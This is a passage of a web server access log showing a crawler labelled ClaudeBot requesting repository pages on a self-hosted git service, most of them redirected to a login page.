"/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fstatic" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService%2Fappsettings.json" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:29 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.env.local" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fjs" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fupdate_status.py" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fcomponents%2FFooter.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService%2Fobj%2FTestService.csproj.nuget.g.props" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:30 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2Finit_db.py" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2FOpcUaMinimal%2Fobj" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:31 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.env.local" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fcomponents%2FAbout.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fletsencrypt" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fapp%2Fdatabase.py" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Fkeys.json" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService%2Fobj" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fcomponents%2FHero.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService%2FProperties%2FlaunchSettings.json" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fcomponents%2FContact.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fstatic%2Fcss" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/archive/adf9a81cb0ea52c9fa32f352b5800e021665bb47.tar.gz" [Client 216.73.216.188] [Length 258977] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 11492] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2FOpcUaMinimal%2FTestService" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fstatic%2Fjs%2Fapp.js" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fservices%2FgeminiService.ts" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fservices%2FgeminiService.ts" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Fnginx%2Fproxy_host" [Client 216.73.216.188] [Length 4845] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md?display=rendered" [Client 216.73.216.188] [Length 11316] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2Fobj" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md?display=rendered" [Client 216.73.216.188] [Length 11323] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/httpx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 216.73.216.188] [Length 10089] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log" [Client 216.73.216.188] [Length 14403] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 13525] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/activate" -[15/Feb/2026:12:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/normalizer" -[15/Feb/2026:12:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/activate" -[15/Feb/2026:12:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/httpx" -[15/Feb/2026:12:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile" [Client 216.73.216.188] [Length 11575] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 11543] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2Fstyle.css" [Client 216.73.216.188] [Length 30538] [Gzip 8.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Finclude%2Fsite%2Fpython3.12" [Client 216.73.216.188] [Length 29173] [Gzip 6.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf" [Client 216.73.216.188] [Length 11661] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 13006] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; 